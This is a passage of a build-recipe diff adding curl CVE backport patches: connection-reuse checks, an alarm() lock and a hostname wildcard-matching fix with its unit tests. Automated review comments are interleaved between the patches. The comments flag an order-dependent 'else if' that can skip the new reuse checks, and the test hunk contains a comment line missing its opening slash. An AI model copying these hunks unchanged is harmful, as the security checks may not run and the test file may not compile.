+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/ftp.c | 30 ++++++++++++++++++++++++++++--
+ lib/ftp.h | 5 +++++
+ lib/setopt.c | 2 +-
+ lib/url.c | 16 +++++++++++++++-
+ lib/urldata.h | 4 ++--
+ 5 files changed, 51 insertions(+), 6 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 31a34e8..7a82a74 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -4059,6 +4059,10 @@ static CURLcode ftp_disconnect(struct connectdata *conn, bool dead_connection)
+ }
+
+ freedirs(ftpc);
++ free(ftpc->account);
++ ftpc->account = NULL;
++ free(ftpc->alternative_to_user);
++ ftpc->alternative_to_user = NULL;
+ free(ftpc->prevpath);
+ ftpc->prevpath = NULL;
+ free(ftpc->server_os);
+@@ -4326,11 +4330,31 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+ struct Curl_easy *data = conn->data;
+ char *type;
+ struct FTP *ftp;
++ struct ftp_conn *ftpc = &conn->proto.ftpc;
+
+- conn->data->req.protop = ftp = calloc(sizeof(struct FTP), 1);
++ ftp = calloc(sizeof(struct FTP), 1);
+ if(NULL == ftp)
+ return CURLE_OUT_OF_MEMORY;
+
++ /* clone connection related data that is FTP specific */
++ if(data->set.str[STRING_FTP_ACCOUNT]) {
++ ftpc->account = strdup(data->set.str[STRING_FTP_ACCOUNT]);
++ if(!ftpc->account) {
++ free(ftp);
++ return CURLE_OUT_OF_MEMORY;
++ }
++ }
++ if(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]) {
++ ftpc->alternative_to_user =
++ strdup(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]);
++ if(!ftpc->alternative_to_user) {
++ Curl_safefree(ftpc->account);
++ free(ftp);
++ return CURLE_OUT_OF_MEMORY;
++ }
++ }
++ conn->data->req.protop = ftp;
++
+ ftp->path = &data->state.up.path[1]; /* don't include the initial slash */
+
+ /* FTP URLs support an extension like ";type=<typecode>" that
+@@ -4366,7 +4390,9 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+ /* get some initial data into the ftp struct */
+ ftp->transfer = FTPTRANSFER_BODY;
+ ftp->downloadsize = 0;
+- conn->proto.ftpc.known_filesize = -1; /* unknown size for now */
++ ftpc->known_filesize = -1; /* unknown size for now */
++ ftpc->use_ssl = data->set.use_ssl;
++ ftpc->ccc = data->set.ftp_ccc;
+
+ return CURLE_OK;
+ }
+diff --git a/lib/ftp.h b/lib/ftp.h
+index 984347f..163dcb3 100644
+--- a/lib/ftp.h
++++ b/lib/ftp.h
+@@ -116,6 +116,8 @@ struct FTP {
+ struct */
+ struct ftp_conn {
+ struct pingpong pp;
++ char *account;
++ char *alternative_to_user;
+ char *entrypath; /* the PWD reply when we logged on */
+ char **dirs; /* realloc()ed array for path components */
+ int dirdepth; /* number of entries used in the 'dirs' array */
+@@ -141,6 +143,9 @@ struct ftp_conn {
+ ftpstate state; /* always use ftp.c:state() to change state! */
+ ftpstate state_saved; /* transfer type saved to be reloaded after
+ data connection is established */
++ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
++ IMAP or POP3 or others! (type: curl_usessl)*/
++ unsigned char ccc; /* ccc level for this connection */
+ curl_off_t retr_size_saved; /* Size of retrieved file saved */
+ char *server_os; /* The target server operating system. */
+ curl_off_t known_filesize; /* file size is different from -1, if wildcard
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4d96f6b..a91bb70 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2126,7 +2126,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ arg = va_arg(param, long);
+ if((arg < CURLUSESSL_NONE) || (arg >= CURLUSESSL_LAST))
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+- data->set.use_ssl = (curl_usessl)arg;
++ data->set.use_ssl = (unsigned char)arg;
+ break;
+
+ case CURLOPT_SSL_OPTIONS:
+diff --git a/lib/url.c b/lib/url.c
+index dfbde3b..f84375c 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,10 +1257,24 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
+- if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
++#ifdef USE_SSH
++ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+ continue;
+ }
++#endif
++#ifndef CURL_DISABLE_FTP
++ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_FTP) {
++ /* Also match ACCOUNT, ALTERNATIVE-TO-USER, USE_SSL and CCC options */
++ if(Curl_timestrcmp(needle->proto.ftpc.account,
++ check->proto.ftpc.account) ||
++ Curl_timestrcmp(needle->proto.ftpc.alternative_to_user,
++ check->proto.ftpc.alternative_to_user) ||
++ (needle->proto.ftpc.use_ssl != check->proto.ftpc.use_ssl) ||
++ (needle->proto.ftpc.ccc != check->proto.ftpc.ccc))
++ continue;
++ }
++#endif
+
+ if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+ needle->bits.tunnel_proxy) {
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 168f874..51b793b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1730,8 +1730,6 @@ struct UserDefined {
+ void *ssh_keyfunc_userp; /* custom pointer to callback */
+ enum CURL_NETRC_OPTION
+ use_netrc; /* defined in include/curl.h */
+- curl_usessl use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
+- IMAP or POP3 or others! */
+ long new_file_perms; /* Permissions to use when creating remote files */
+ long new_directory_perms; /* Permissions to use when creating remote dirs */
+ long ssh_auth_types; /* allowed SSH auth types */
+@@ -1851,6 +1849,8 @@ struct UserDefined {
+ BIT(http09_allowed); /* allow HTTP/0.9 responses */
+ BIT(mail_rcpt_allowfails); /* allow RCPT TO command to fail for some
+ recipients */
++ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
++ IMAP or POP3 or others! (type: curl_usessl)*/
+ };
+
+ struct Names {
+--
+2.25.1
+
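Review bot: In the lib/url.c part, the new `else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH)` follows directly after the closing brace of the `if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST))` block (see the context lines here and in the pre1 patch), so with this patch alone the SSH check and the new FTP check only run when that flag is set. If the FTP and SSH handlers do not carry PROTOPT_CREDSPERREQUEST (not visible here), the ACCOUNT / ALTERNATIVE-TO-USER / use_ssl / ccc comparison is never reached. CVE-2023-27536.patch later inserts `if(needle->gssapi_delegation != check->gssapi_delegation) continue;` in front of the `#ifdef USE_SSH`, which rebinds the `else` and makes the checks reachable again, so the result depends on both patches being applied in that order. Writing both branches as plain `if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {` and `if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_FTP) {` would remove that dependency. ConnectionExists starts and ends outside the hunk.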
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27536.patch b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
new file mode 100644
index 0000000000..b04a77de25
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
@@ -0,0 +1,55 @@
+From cb49e67303dbafbab1cebf4086e3ec15b7d56ee5 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 09:22:43 +0100
+Subject: [PATCH] url: only reuse connections with same GSS delegation
+
+Reported-by: Harry Sintonen
+Closes #10731
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/cb49e67303dbafbab1cebf4086e3ec15b7d56ee5]
+CVE: CVE-2023-27536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/url.c | 6 ++++++
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+)
+
+diff --git a/lib/url.c b/lib/url.c
+index f84375c..87f4eb0 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,6 +1257,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ /* GSS delegation differences do not actually affect every connection
++ and auth method, but this check takes precaution before efficiency */
++ if(needle->gssapi_delegation != check->gssapi_delegation)
++ continue;
++
+ #ifdef USE_SSH
+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+@@ -1708,6 +1713,7 @@ static struct connectdata *allocate_conn(struct Curl_easy *data)
+ conn->fclosesocket = data->set.fclosesocket;
+ conn->closesocket_client = data->set.closesocket_client;
+ conn->lastused = Curl_now(); /* used now */
++ conn->gssapi_delegation = data->set.gssapi_delegation;
+
+ return conn;
+ error:
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 51b793b..b8a611b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1118,6 +1118,7 @@ struct connectdata {
+ handle */
+ BIT(sock_accepted); /* TRUE if the SECONDARYSOCKET was created with
+ accept() */
++ long gssapi_delegation; /* inherited from set.gssapi_delegation */
+ };
+
+ /* The end of connectdata. */
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27538.patch b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
new file mode 100644
index 0000000000..6c40989d3b
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
@@ -0,0 +1,31 @@
+From af369db4d3833272b8ed443f7fcc2e757a0872eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 08:22:51 +0100
+Subject: [PATCH] url: fix the SSH connection reuse check
+
+Reported-by: Harry Sintonen
+Closes #10735
+
+CVE: CVE-2023-27538
+Upstream-Status: Backport [https://github.com/curl/curl/commit/af369db4d3833272b8ed443f7fcc2e757a0872eb]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/url.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 8da0245..9f14a7b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1266,7 +1266,7 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
+- if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+ continue;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
new file mode 100644
index 0000000000..eaa6fdc327
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
@@ -0,0 +1,197 @@
+From f446258f0269a62289cca0210157cb8558d0edc3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 16 May 2023 23:40:42 +0200
+Subject: [PATCH] hostip: include easy_lock.h before using
+ GLOBAL_INIT_IS_THREADSAFE
+
+Since that header file is the only place that define can be defined.
+
+Reported-by: Marc Deslauriers
+
+Follow-up to 13718030ad4b3209
+
+Closes #11121
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f446258f0269a62289cca0210157cb8558d0edc3]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/easy_lock.h | 109 ++++++++++++++++++++++++++++++++++++++++++++++++
+ lib/hostip.c | 10 ++---
+ lib/hostip.h | 9 ----
+ 3 files changed, 113 insertions(+), 15 deletions(-)
+ create mode 100644 lib/easy_lock.h
+
+diff --git a/lib/easy_lock.h b/lib/easy_lock.h
+new file mode 100644
+index 0000000..6399a39
+--- /dev/null
++++ b/lib/easy_lock.h
+@@ -0,0 +1,109 @@
++#ifndef HEADER_CURL_EASY_LOCK_H
++#define HEADER_CURL_EASY_LOCK_H
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#define GLOBAL_INIT_IS_THREADSAFE
++
++#if defined(_WIN32_WINNT) && _WIN32_WINNT >= 0x600
++
++#ifdef __MINGW32__
++#ifndef __MINGW64_VERSION_MAJOR
++#if (__MINGW32_MAJOR_VERSION < 5) || \
++ (__MINGW32_MAJOR_VERSION == 5 && __MINGW32_MINOR_VERSION == 0)
++/* mingw >= 5.0.1 defines SRWLOCK, and slightly different from MS define */
++typedef PVOID SRWLOCK, *PSRWLOCK;
++#endif
++#endif
++#ifndef SRWLOCK_INIT
++#define SRWLOCK_INIT NULL
++#endif
++#endif /* __MINGW32__ */
++
++#define curl_simple_lock SRWLOCK
++#define CURL_SIMPLE_LOCK_INIT SRWLOCK_INIT
++
++#define curl_simple_lock_lock(m) AcquireSRWLockExclusive(m)
++#define curl_simple_lock_unlock(m) ReleaseSRWLockExclusive(m)
++
++#elif defined(HAVE_ATOMIC) && defined(HAVE_STDATOMIC_H)
++#include <stdatomic.h>
++#if defined(HAVE_SCHED_YIELD)
++#include <sched.h>
++#endif
++
++#define curl_simple_lock atomic_int
++#define CURL_SIMPLE_LOCK_INIT 0
++
++/* a clang-thing */
++#ifndef __has_builtin
++#define __has_builtin(x) 0
++#endif
++
++#ifndef __INTEL_COMPILER
++/* The Intel compiler tries to look like GCC *and* clang *and* lies in its
++ __has_builtin() function, so override it. */
++
++/* if GCC on i386/x86_64 or if the built-in is present */
++#if ( (defined(__GNUC__) && !defined(__clang__)) && \
++ (defined(__i386__) || defined(__x86_64__))) || \
++ __has_builtin(__builtin_ia32_pause)
++#define HAVE_BUILTIN_IA32_PAUSE
++#endif
++
++#endif
++
++static inline void curl_simple_lock_lock(curl_simple_lock *lock)
++{
++ for(;;) {
++ if(!atomic_exchange_explicit(lock, true, memory_order_acquire))
++ break;
++ /* Reduce cache coherency traffic */
++ while(atomic_load_explicit(lock, memory_order_relaxed)) {
++ /* Reduce load (not mandatory) */
++#ifdef HAVE_BUILTIN_IA32_PAUSE
++ __builtin_ia32_pause();
++#elif defined(__aarch64__)
++ __asm__ volatile("yield" ::: "memory");
++#elif defined(HAVE_SCHED_YIELD)
++ sched_yield();
++#endif
++ }
++ }
++}
++
++static inline void curl_simple_lock_unlock(curl_simple_lock *lock)
++{
++ atomic_store_explicit(lock, false, memory_order_release);
++}
++
++#else
++
++#undef GLOBAL_INIT_IS_THREADSAFE
++
++#endif
++
++#endif /* HEADER_CURL_EASY_LOCK_H */
+diff --git a/lib/hostip.c b/lib/hostip.c
+index 5231a74..d5bf881 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,6 +68,8 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+
++#include "easy_lock.h"
++
+ #if defined(CURLRES_SYNCH) && \
+ defined(HAVE_ALARM) && \
+ defined(SIGALRM) && \
+@@ -77,10 +79,6 @@
+ #define USE_ALARM_TIMEOUT
+ #endif
+
+-#ifdef USE_ALARM_TIMEOUT
+-#include "easy_lock.h"
+-#endif
+-
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+
+ /*
+@@ -259,8 +257,8 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ /* Beware this is a global and unique instance. This is used to store the
+ return address that we can jump back to from inside a signal handler. This
+ is not thread-safe stuff. */
+-sigjmp_buf curl_jmpenv;
+-curl_simple_lock curl_jmpenv_lock;
++static sigjmp_buf curl_jmpenv;
++static curl_simple_lock curl_jmpenv_lock;
+ #endif
+
+ /* lookup address, returns entry if found and not stale */
+diff --git a/lib/hostip.h b/lib/hostip.h
+index baf1e58..d7f73d9 100644
+--- a/lib/hostip.h
++++ b/lib/hostip.h
+@@ -196,15 +196,6 @@ Curl_cache_addr(struct Curl_easy *data, Curl_addrinfo *addr,
+ #define CURL_INADDR_NONE INADDR_NONE
+ #endif
+
+-#ifdef HAVE_SIGSETJMP
+-/* Forward-declaration of variable defined in hostip.c. Beware this
+- * is a global and unique instance. This is used to store the return
+- * address that we can jump back to from inside a signal handler.
+- * This is not thread-safe stuff.
+- */
+-extern sigjmp_buf curl_jmpenv;
+-#endif
+-
+ /*
+ * Function provided by the resolver backend to set DNS servers to use.
+ */
+--
+2.25.1
+
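Review bot: On non-Windows builds the lock implementation in the new lib/easy_lock.h is only selected when `HAVE_ATOMIC` and `HAVE_STDATOMIC_H` are defined, and the diffstat contains no configure or build-system change that would define them. If the build does not define them, the header ends in `#undef GLOBAL_INIT_IS_THREADSAFE`, and since CVE-2023-28320.patch makes `USE_ALARM_TIMEOUT` depend on that macro, the alarm()-based name lookup timeout is compiled out rather than protected by the lock. That may be an acceptable way to close the CVE, but it is a behaviour change for the synchronous resolver and should be stated in the patch header, e.g. `Note: without HAVE_ATOMIC the alarm() resolver timeout is disabled`. It is worth confirming against the generated curl_config.h which branch the target build actually takes.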
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320.patch b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
new file mode 100644
index 0000000000..0c9b67440a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
@@ -0,0 +1,86 @@
+From 13718030ad4b3209a7583b4f27f683cd3a6fa5f2 Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Tue, 25 Apr 2023 09:22:26 +0200
+Subject: [PATCH] hostip: add locks around use of global buffer for alarm()
+
+When building with the sync name resolver and timeout ability we now
+require thread-safety to be present to enable it.
+
+Closes #11030
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/13718030ad4b3209a7583b4f27f683cd3a6fa5f2]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/hostip.c | 19 +++++++++++++++----
+ 1 file changed, 15 insertions(+), 4 deletions(-)
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index f5bb634..5231a74 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,12 +68,19 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+
+-#if defined(CURLRES_SYNCH) && \
+- defined(HAVE_ALARM) && defined(SIGALRM) && defined(HAVE_SIGSETJMP)
++#if defined(CURLRES_SYNCH) && \
++ defined(HAVE_ALARM) && \
++ defined(SIGALRM) && \
++ defined(HAVE_SIGSETJMP) && \
++ defined(GLOBAL_INIT_IS_THREADSAFE)
+ /* alarm-based timeouts can only be used with all the dependencies satisfied */
+ #define USE_ALARM_TIMEOUT
+ #endif
+
++#ifdef USE_ALARM_TIMEOUT
++#include "easy_lock.h"
++#endif
++
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+
+ /*
+@@ -248,11 +255,12 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ Curl_share_unlock(data, CURL_LOCK_DATA_DNS);
+ }
+
+-#ifdef HAVE_SIGSETJMP
++#ifdef USE_ALARM_TIMEOUT
+ /* Beware this is a global and unique instance. This is used to store the
+ return address that we can jump back to from inside a signal handler. This
+ is not thread-safe stuff. */
+ sigjmp_buf curl_jmpenv;
++curl_simple_lock curl_jmpenv_lock;
+ #endif
+
+ /* lookup address, returns entry if found and not stale */
+@@ -614,7 +622,6 @@ enum resolve_t Curl_resolv(struct connectdata *conn,
+ static
+ RETSIGTYPE alarmfunc(int sig)
+ {
+- /* this is for "-ansi -Wall -pedantic" to stop complaining! (rabe) */
+ (void)sig;
+ siglongjmp(curl_jmpenv, 1);
+ }
+@@ -695,6 +702,8 @@ enum resolve_t Curl_resolv_timeout(struct connectdata *conn,
+ This should be the last thing we do before calling Curl_resolv(),
+ as otherwise we'd have to worry about variables that get modified
+ before we invoke Curl_resolv() (and thus use "volatile"). */
++ curl_simple_lock_lock(&curl_jmpenv_lock);
++
+ if(sigsetjmp(curl_jmpenv, 1)) {
+ /* this is coming from a siglongjmp() after an alarm signal */
+ failf(data, "name lookup timed out");
+@@ -763,6 +772,8 @@ clean_up:
+ #endif
+ #endif /* HAVE_SIGACTION */
+
++ curl_simple_lock_unlock(&curl_jmpenv_lock);
++
+ /* switch back the alarm() to either zero or to what it was before minus
+ the time we spent until now! */
+ if(prev_alarm) {
+--
+2.25.1
+
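Review bot: The comment kept above `curl_jmpenv` still ends with "This is not thread-safe stuff" although the added `curl_jmpenv_lock` is there to serialise its use; it should say what guards the buffer, for example `/* Guarded by curl_jmpenv_lock, held from before sigsetjmp() until clean_up. */`. The lock is taken before `sigsetjmp()` and released at `clean_up`, so it is held for the whole lookup and a second thread resolving with a timeout waits until the first one finishes. Curl_resolv_timeout continues outside both hunks, so it cannot be confirmed from here that every path reaching `clean_up` has taken the lock first.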
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28321.patch b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
new file mode 100644
index 0000000000..da1d1fdcd6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
@@ -0,0 +1,272 @@
+Upstream-Status: Backport [import from ubuntu curl_7.68.0-1ubuntu2.20 with
+minor change to tests/data/test1397 part so the patch can be apply.
+upstream: https://github.com/curl/curl/commit/199f2d440d8659b42 ]
+CVE: CVE-2023-28321
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+This backport was obtained from SUSE.
+
+From 199f2d440d8659b42670c1b796220792b01a97bf Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 24 Apr 2023 21:07:02 +0200
+Subject: [PATCH] hostcheck: fix host name wildcard checking
+
+The leftmost "label" of the host name can now only match against single
+'*'. Like the browsers have worked for a long time.
+
+- extended unit test 1397 for this
+- move some SOURCE variables from unit/Makefile.am to unit/Makefile.inc
+
+Reported-by: Hiroki Kurosawa
+Closes #11018
+---
+ lib/hostcheck.c | 50 +++++++--------
+ tests/data/test1397 | 10 ++-
+ tests/unit/Makefile.am | 94 ----------------------------
+ tests/unit/Makefile.inc | 94 ++++++++++++++++++++++++++++
+ tests/unit/unit1397.c | 134 ++++++++++++++++++++++++----------------
+ 5 files changed, 202 insertions(+), 180 deletions(-)
+
+--- a/lib/hostcheck.c
++++ b/lib/hostcheck.c
+@@ -58,15 +58,19 @@
+ * apparent distinction between a name and an IP. We need to detect the use of
+ * an IP address and not wildcard match on such names.
+ *
++ * Only match on "*" being used for the leftmost label, not "a*", "a*b" nor
++ * "*b".
++ *
++ * @unittest: 1397
++ *
+ * NOTE: hostmatch() gets called with copied buffers so that it can modify the
+ * contents at will.
+ */
+
+ static int hostmatch(char *hostname, char *pattern)
+ {
+- const char *pattern_label_end, *pattern_wildcard, *hostname_label_end;
+- int wildcard_enabled;
+- size_t prefixlen, suffixlen;
++ const char *pattern_label_end, *hostname_label_end;
++ size_t suffixlen;
+ struct in_addr ignored;
+ #ifdef ENABLE_IPV6
+ struct sockaddr_in6 si6;
+@@ -80,13 +84,12 @@ static int hostmatch(char *hostname, cha
+ if(pattern[len-1]=='.')
+ pattern[len-1] = 0;
+
+- pattern_wildcard = strchr(pattern, '*');
+- if(pattern_wildcard == NULL)
++ if(strncmp(pattern, "*.", 2))
+ return strcasecompare(pattern, hostname) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+
+ /* detect IP address as hostname and fail the match if so */
+- if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
++ else if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
+ return CURL_HOST_NOMATCH;
+ #ifdef ENABLE_IPV6
+ if(Curl_inet_pton(AF_INET6, hostname, &si6.sin6_addr) > 0)
+@@ -95,14 +98,9 @@ static int hostmatch(char *hostname, cha
+
+ /* We require at least 2 dots in pattern to avoid too wide wildcard
+ match. */
+- wildcard_enabled = 1;
+ pattern_label_end = strchr(pattern, '.');
+- if(pattern_label_end == NULL || strchr(pattern_label_end + 1, '.') == NULL ||
+- pattern_wildcard > pattern_label_end ||
+- strncasecompare(pattern, "xn--", 4)) {
+- wildcard_enabled = 0;
+- }
+- if(!wildcard_enabled)
++ if(pattern_label_end == NULL ||
++ strchr(pattern_label_end + 1, '.') == NULL)
+ return strcasecompare(pattern, hostname) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+
+@@ -117,11 +115,9 @@ static int hostmatch(char *hostname, cha
+ if(hostname_label_end - hostname < pattern_label_end - pattern)
+ return CURL_HOST_NOMATCH;
+
+- prefixlen = pattern_wildcard - pattern;
+- suffixlen = pattern_label_end - (pattern_wildcard + 1);
+- return strncasecompare(pattern, hostname, prefixlen) &&
+- strncasecompare(pattern_wildcard + 1, hostname_label_end - suffixlen,
+- suffixlen) ?
++ suffixlen = pattern_label_end - (pattern + 1);
++ return strncasecompare(pattern + 1, hostname_label_end - suffixlen,
++ suffixlen) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+ }
+
+--- a/tests/data/test1397
++++ b/tests/data/test1397
+@@ -2,8 +2,7 @@
+ <info>
+ <keywords>
+ unittest
+-ssl
+-wildcard
++Curl_cert_hostcheck
+ </keywords>
+ </info>
+
+@@ -16,9 +15,8 @@ none
+ <features>
+ unittest
+ </features>
+- <name>
+-Check wildcard certificate matching function Curl_cert_hostcheck
+- </name>
++<name>
++Curl_cert_hostcheck unit tests
++</name>
+ </client>
+-
+ </testcase>
+--- a/tests/unit/unit1397.c
++++ b/tests/unit/unit1397.c
+@@ -21,8 +21,6 @@
+ ***************************************************************************/
+ #include "curlcheck.h"
+
+-#include "hostcheck.h" /* from the lib dir */
+-
+ static CURLcode unit_setup(void)
+ {
+ return CURLE_OK;
+@@ -30,50 +28,94 @@ static CURLcode unit_setup(void)
+
+ static void unit_stop(void)
+ {
+- /* done before shutting down and exiting */
+ }
+
+-UNITTEST_START
++* only these backends define the tested functions */
++#if defined(USE_OPENSSL) || defined(USE_GSKIT) || \
++ defined(USE_SCHANNEL)
++#include "hostcheck.h"
++struct testcase {
++ const char *host;
++ const char *pattern;
++ bool match;
++};
++
++static struct testcase tests[] = {
++ {"", "", FALSE},
++ {"a", "", FALSE},
++ {"", "b", FALSE},
++ {"a", "b", FALSE},
++ {"aa", "bb", FALSE},
++ {"\xff", "\xff", TRUE},
++ {"aa.aa.aa", "aa.aa.bb", FALSE},
++ {"aa.aa.aa", "aa.aa.aa", TRUE},
++ {"aa.aa.aa", "*.aa.bb", FALSE},
++ {"aa.aa.aa", "*.aa.aa", TRUE},
++ {"192.168.0.1", "192.168.0.1", TRUE},
++ {"192.168.0.1", "*.168.0.1", FALSE},
++ {"192.168.0.1", "*.0.1", FALSE},
++ {"h.ello", "*.ello", FALSE},
++ {"h.ello.", "*.ello", FALSE},
++ {"h.ello", "*.ello.", FALSE},
++ {"h.e.llo", "*.e.llo", TRUE},
++ {"h.e.llo", " *.e.llo", FALSE},
++ {" h.e.llo", "*.e.llo", TRUE},
++ {"h.e.llo.", "*.e.llo", TRUE},
++ {"*.e.llo.", "*.e.llo", TRUE},
++ {"************.e.llo.", "*.e.llo", TRUE},
++ {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
++ "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
++ "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
++ "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
++ "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
++ ".e.llo.", "*.e.llo", TRUE},
++ {"\xfe\xfe.e.llo.", "*.e.llo", TRUE},
++ {"h.e.llo.", "*.e.llo.", TRUE},
++ {"h.e.llo", "*.e.llo.", TRUE},
++ {".h.e.llo", "*.e.llo.", FALSE},
++ {"h.e.llo", "*.*.llo.", FALSE},
++ {"h.e.llo", "h.*.llo", FALSE},
++ {"h.e.llo", "h.e.*", FALSE},
++ {"hello", "*.ello", FALSE},
++ {"hello", "**llo", FALSE},
++ {"bar.foo.example.com", "*.example.com", FALSE},
++ {"foo.example.com", "*.example.com", TRUE},
++ {"baz.example.net", "b*z.example.net", FALSE},
++ {"foobaz.example.net", "*baz.example.net", FALSE},
++ {"xn--l8j.example.local", "x*.example.local", FALSE},
++ {"xn--l8j.example.net", "*.example.net", TRUE},
++ {"xn--l8j.example.net", "*j.example.net", FALSE},
++ {"xn--l8j.example.net", "xn--l8j.example.net", TRUE},
++ {"xn--l8j.example.net", "xn--l8j.*.net", FALSE},
++ {"xl8j.example.net", "*.example.net", TRUE},
++ {"fe80::3285:a9ff:fe46:b619", "*::3285:a9ff:fe46:b619", FALSE},
++ {"fe80::3285:a9ff:fe46:b619", "fe80::3285:a9ff:fe46:b619", TRUE},
++ {NULL, NULL, FALSE}
++};
+
